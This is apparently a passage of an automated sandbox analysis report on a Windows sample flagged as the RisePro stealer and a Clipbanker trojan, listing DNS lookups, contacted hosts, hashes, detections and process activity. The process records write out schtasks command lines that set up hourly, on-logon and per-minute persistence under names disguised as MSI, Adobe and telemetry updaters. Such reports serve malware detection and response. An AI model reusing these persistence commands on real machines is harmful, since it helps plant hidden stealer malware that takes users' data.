                    May 17, 2024 23:45:32.950365067 CEST192.168.2.51.1.1.10xfa2Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    May 17, 2024 23:45:02.500276089 CEST1.1.1.1192.168.2.50xac3fNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                    May 17, 2024 23:45:03.770749092 CEST1.1.1.1192.168.2.50xf651No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                    May 17, 2024 23:45:03.770749092 CEST1.1.1.1192.168.2.50xf651No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                    May 17, 2024 23:45:03.770749092 CEST1.1.1.1192.168.2.50xf651No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                    May 17, 2024 23:45:17.515978098 CEST1.1.1.1192.168.2.50x6fe6Name error (3)kuljyftgjk.onlinenonenoneA (IP address)IN (0x0001)false
                    May 17, 2024 23:45:31.150041103 CEST1.1.1.1192.168.2.50x6f3bName error (3)kuljyftgjk.onlinenonenoneA (IP address)IN (0x0001)false
                    May 17, 2024 23:45:32.998289108 CEST1.1.1.1192.168.2.50xfa2Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • https:
                      • ipinfo.io
                    • db-ip.com
                    • 5.42.96.170

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:17:44:54
                    Start date:17/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x1b0000
                    File size:8'778'752 bytes
                    MD5 hash:3D09739846543F4962F2B432DA671C29
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:3
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
                    Imagebase:0x7ff6d64d0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:8
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:9
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:10
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:11
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:17:45:17
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:13
                    Start time:17:45:17
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:17:45:18
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:15
                    Start time:17:45:18
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:16
                    Start time:17:45:19
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:17
                    Start time:17:45:24
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Has exited:true

                    General

                    Target ID:18
                    Start time:17:45:33
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    Has exited:true

                    General

                    Target ID:19
                    Start time:17:45:41
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Has exited:true

                    Disassembly

                    No disassembly